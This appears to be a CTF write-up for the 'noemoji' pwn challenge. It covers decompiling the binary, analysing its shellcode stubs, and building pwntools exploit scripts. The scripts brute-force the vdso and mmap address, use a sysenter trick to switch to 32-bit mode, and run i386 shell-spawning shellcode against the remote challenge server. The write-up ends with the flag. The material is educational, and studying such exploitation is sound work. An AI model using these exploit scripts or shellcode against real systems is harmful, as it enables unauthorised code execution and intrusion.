Variation on the theme of 0ctf's eeemoji.
This challenge is running on Ubuntu 18.04.
nc noemoji.hackable.software 1337
Unfortunately, we didn't have the time to play this really awesome CTF but I got some time to have a look at the PWN challenges at the beginning of the CTF and this one really got my attention.
I tried playing with it whenever I had time during the CTF but I got stuck and couldn't solve it before the CTF ended. I joined the IRC, knew what the intended solution was and here's me trying to understand and reproduce it:
Checking the given binary and its security flags
Running the binary we get the memory mappings of the process then we're presented with a menu
Static Analysis
Throwing the binary to IDA and jumping right into the main
function
__int64 __fastcall main(const char *a1, char **a2, char **a3)
{
char v4; // [rsp+6h] [rbp-Ah]
unsigned __int64 v5; // [rsp+8h] [rbp-8h]
v5 = __readfsqword(0x28u);
while ( 1 )
{
sub_17B9();
if ( !sub_1259(0, &v4, 2uLL) )
return 0LL;
if ( v4 == 'h' )
{
sub_16A7();
}
else
{
if ( v4 > 'h' )
goto LABEL_11;
if ( v4 == 'b' )
{
sub_14F7();
}
else if ( v4 == 'c' )
{
puts("Please contact our Sales Team for premium offers!");
}
else
{
LABEL_11:
puts("Invalid option!");
}
}
}
}
There are four function used inside the main
which are:
sub_17B9
sub_1259
sub_16A7
sub_14F7
Given that we already know the options from the runtime, we can see that the cow option c
is useless so we're left with both beer and horse options.
sub_17B9
simply prints the menu we saw at the runtime
int sub_17B9()
{
return puts(
"\n"
"Welcome to a no-eeeeeeeeeeeemoji\n"
"[h]orse: Don't frighten my horse.\n"
"[c]ow: Miaow miaow miaow (only premium users)\n"
"[b]eer: cow beer\n");
}
sub_1259
reads bytes with a given size
unsigned __int64 __fastcall sub_1259(int a1, __int64 a2, unsigned __int64 a3)
{
unsigned __int64 v4; // [rsp+8h] [rbp-28h]
unsigned __int64 v5; // [rsp+20h] [rbp-10h]
ssize_t v6; // [rsp+28h] [rbp-8h]
v4 = a3;
v5 = 0LL;
while ( v5 < v4 )
{
v6 = read(a1, (v5 + a2), v4 - v5);
if ( v6 >= 0 )
{
if ( !v6 )
return v5;
v5 += v6;
}
else if ( *__errno_location() != 4 && *__errno_location() != 11 && *__errno_location() != 11 )
{
err(1, "read");
}
}
return v5;
}
Before jumping into the beer and horse functions lets look at a function in the _init_array
unsigned __int64 sub_1412()
{
unsigned int v0; // eax
void (__noreturn *v2)(); // [rsp+0h] [rbp-A0h]
unsigned __int64 v3; // [rsp+98h] [rbp-8h]
v3 = __readfsqword(0x28u);
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
sub_1306();
v0 = time(0LL);
srand(v0);
memset(&v2, 0, 0x98uLL);
v2 = sub_13F1;
if ( sigaction(14, &v2, 0LL) < 0 )
err(1, "sigaction");
alarm(300u);
return v3 - __readfsqword(0x28u);
}
It simply initialize the buffers, calls sub_1306
then calls alarm
with 300 seconds that will result in a call to sub_13F1
Looking at sub_1306
, it's the function printing the memory mappings.
unsigned __int64 sub_1306()
{
int fd; // [rsp+Ch] [rbp-1014h]
char s[8]; // [rsp+10h] [rbp-1010h]
__int64 v3; // [rsp+18h] [rbp-1008h]
char v4; // [rsp+20h] [rbp-1000h]
unsigned __int64 v5; // [rsp+1018h] [rbp-8h]
v5 = __readfsqword(0x28u);
fd = open("/proc/self/maps", 0);
if ( fd < 0 )
err(1, "open maps");
*s = 0LL;
v3 = 0LL;
memset(&v4, 0, 0xFF0uLL);
sub_1259(fd, s, 0xFFFuLL);
puts(s);
if ( close(fd) < 0 )
err(1, "close");
return v5 - __readfsqword(0x28u);
}
After 300 seconds sub_13F1
is called which simply calls exit
void __noreturn sub_13F1()
{
puts("Time's up!");
_exit(0);
}
Diving into the functions we'll focus on. Lets start with sub_14F7
(the beer function) first:
int sub_14F7()
{
void *addr; // [rsp+Ch] [rbp-4h]
do
LODWORD(addr) = rand() % 1000 << 12;
while ( addr <= 0xFFFF );
qword_40F0 = mmap(addr, 0x1000uLL, 7, 50, -1, 0LL);
if ( qword_40F0 == -1LL )
err(1, "mmap");
dword_40F8 = 1;
return printf("map() at @%p\n", qword_40F0);
}
It generates a random base address greater than 0xFFFF
then maps 0x1000
bytes at that address with RWX permissions and stores the pointer to the allocated memory in the global variable qword_40F0
. It then sets the global variable dword_40F8
to 1. Finally, it prints qword_40F0
.
Finally, lets have a look at sub_16A7
(the horse function)
__int64 sub_16A7()
{
char *v0; // rdi
if ( !dword_40F8 )
errx(1, "you scared my horse");
memset(qword_40F0, 'A', 4096uLL);
puts("gib:");
sub_1259(0, qword_40F0, 4096uLL);
memcpy(qword_40F0 + 1024, &loc_15B1, (&loc_1668 + 1) - &loc_15B1);
memset(qword_40F0 + 256, 'A', 256uLL);
memset(qword_40F0 + 514, 'A', 254uLL);
v0 = qword_40F0 + 514;
memcpy(qword_40F0 + 514, &loc_1668 + 1, sub_16A7 - (&loc_1668 + 1));
return ((qword_40F0 + 1024))(v0, &loc_1668 + 1);
}
It first checks the dword_40F8
to make sure we used the beer function first. Then it does the following:
- Sets the 4096 bytes in
qword_40F0
to 'A' - Takes input of 4096 bytes into
qword_40F0
- Copies a shellcode from
loc_15B1
intoqword_40F0 + 1024
- Sets 256 bytes to 'A' starting from
qword_40F0 + 256
- Sets 254 bytes to 'A' starting from
qword_40F0 + 514
- Copies another shellcode from
loc_1668
intoqword_40F0 + 514
- Calls the shellcode at
qword_40F0 + 1024
Before jumping into these shellcodes let's first simplify how qword_40F0
will look like after all these operations:
256 bytes of our input
256 bytes filled with 'A's
2 bytes of our input
254 bytes of shellcode from loc_1668 padded with 'A's
256 bytes of our input
184 bytes of shellcode from loc_15B1
2888 bytes of our input
Lets dig into the shellcodes starting with the one at loc_15B1
as it's executed first
sub rsp, 0x8000
mov eax, 41h ; 'A'
lea rdi, [rsp-0x8000]
mov rcx, 0x10000
rep stosb
mov rax, 0xdeadbeefdeadbeef
mov rbx, 0xdeadbeefdeadbeef
mov rcx, 0xdeadbeefdeadbeef
mov rdx, 0xdeadbeefdeadbeef
mov rdi, 0xdeadbeefdeadbeef
mov rsi, 0xdeadbeefdeadbeef
mov rbp, 0xdeadbeefdeadbeef
mov r8, 0xdeadbeefdeadbeef
mov r9, 0xdeadbeefdeadbeef
mov r10, 0xdeadbeefdeadbeef
mov r11, 0xdeadbeefdeadbeef
mov r12, 0xdeadbeefdeadbeef
mov r13, 0xdeadbeefdeadbeef
mov r14, 0xdeadbeefdeadbeef
mov r15, 0xdeadbeefdeadbeef
jmp 0xfffffffffffffd4d
As we can see it fills the stack with a 0x10000
'A' starting from rsp-0x8000
then it moves 0xdeadbeefdeadbeef
into all registers and finally jumps backwards (to the 2 bytes before the second shellcode).
The other shellcode which is at loc_1668
prints the first 38 bytes in qword_40F0
then terminates the program.
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
lea rsi, [rip+0xfffffffffffffde7]
mov rdi, 1
mov rdx, 0x26
mov rax, 1
syscall
mov rdi, 0
mov rax, 0x3c
syscall
Dynamic Analysis
So far we know that we have 2 bytes that will be executed before the second shellcode but lets confirm that using the following script:
from pwn import *
def choose_from_menu(choice):
io.sendlineafter('beer\n\n', choice)
def beer():
choose_from_menu('b')
io.recvuntil('@')
address = int(io.recvline()[:-1], 16)
return address
io = process('main')
gdb.attach(io)
maps = io.recvuntil('\n\n')
mmap = beer()
info('mmap: {}'.format(hex(mmap)))
payload = 'B' * (512)
payload += '\xcc\xcc'
payload += 'B' * (4096 - len(payload))
choose_from_menu('h')
io.sendlineafter('gib:\n', payload)
io.interactive()
As a matter of fact our analysis was correct and we have 2 executable bytes that we control
The first thing that came to mind at this point was that we need to find a way to jump forwards or backwards to reach a bigger part of the allocated memory that we control. To approach this we thought of three ways:
- A short jump but unfortunately that only works for a maximum jump of 127 bytes forwards or backwards but we need at least a 256 bytes jump to reach our input.
- A near or far jumps padded with the
nops
that are already present. - Bruteforcing the two bytes with the rest of our input as
\xcc
and look forSIGTRAP
But non of the above worked so I got stuck at this point and couldn't think of anything more. After the CTF, I joined the IRC and many was asking about the solution as the challenge had only 1 solve and what I understood from the ongoing conversation:
Use a
sysenter
. The kernel considerssysenter
is called only in a 32bit context, so returning from asysenter
system call withsysexit
, it returns back to to a 32bit address stored in a register which points to the middle of vdsovsyscall
(in vdso 32-bit version)
Right after reading I decided to read some more before I try it out to understand why it all happens. Using this reference, I understood the following:
- Usually when the
sysenter
is called from a userland program it is called via__kernel_vsyscall
which is available in the 32bit version of vdso. As a result the kernel downgrades the userland context into 32bit. - When
sysexit
tries to return to the userland it calculates the address to return to in the__kernel_vsyscall
which will be a 32bit address.
I'm still not sure if I understand the whole thing in a correct way so if I'm stating anything incorrectly please reach out to me so I can fix it.
I adjusted my script to try out this new trick I learned:
It works like a charm but notice that rsp
also has changed as we'll need that later on.
Exploitation
Now we have all the parts we need to start crafting our exploit. The steps of exploitation will be as follows:
- Bruteforce the vdso till the lower 32bit are achievable by our beer function.
- Bruteforce the beer function until we get an address equal to the lower 32bit of the vdso.
- Find the part that we return to in our input and replace it with a 32bit shellcode.
First, to bruteforce the vdso we have to remember the snippet responsible for generates the random address LODWORD(addr) = rand() % 1000 << 12;
. Given that, we need the lower 32bit of vdso to be smaller than 1000 << 12
which is 0x3e8000
. With that in mind we wrote the following script that does all three steps:
from pwn import *
def get_vdso():
maps = io.recvuntil('[vdso]').split('\n')[-1]
vdso = int('0x' + maps.split('-')[0], 16)
vdso = (vdso & 0xffffffff)
return vdso
def choose_from_menu(choice):
io.sendlineafter('beer\n\n', choice)
def beer():
choose_from_menu('b')
io.recvuntil('@')
address = int(io.recvline()[:-1], 16)
return address
l = log.progress('brutforcing vdso: ')
while True:
io = process('main', level='error')
vdso = get_vdso()
l.status(hex(vdso))
if vdso < 0x3e8000:
break
io.close()
l.success('success!')
info('vdso: {}'.format(hex(vdso)))
l = log.progress('brutforcing mmap: ')
while True:
mmap = beer()
l.status(hex(mmap))
if mmap == vdso:
break
l.success('success!')
info('mmap: {}'.format(hex(mmap)))
payload = '\xcc' * (512)
payload += '\x0f\x34'
payload += '\xcc' * (4096 - len(payload))
choose_from_menu('h')
io.sendlineafter('gib:\n', payload)
io.interactive()
We actually hit a our input at the offset 0xb5a
which is at the last part of our input.
Now, lets add a 32bit shellcode -as we're now downgraded to 32bit- instead of the breakpoints but before the shellcode we need to adjust the stack pointer to point to a valid writable memory location which I chose to be mmap + 512
shellcode = asm('mov esp, {}\n'.format(mmap + 512) + shellcraft.i386.sh())
payload = '\x90' * (512)
payload += '\x0f\x34'
payload += '\x90' * (4096 - len(payload) - len(shellcode))
payload += shellcode
Then we switch to the remote server instead of locally by changing
io = process('main', level='error')
to
io = remote('noemoji.hackable.software', 1337, level='error')
and WE GET THE FLAG!
I really loved this challenge and the new stuff I got to learn by attempting to solve it. It actually made me regret even more not having time to play the CTF but at least I got to learn a new thing ¯\_(ツ)_/¯
DrgnS{H0p3_y0u_d1dn7_jUsT_brUt3_y0ur_sOlu710n}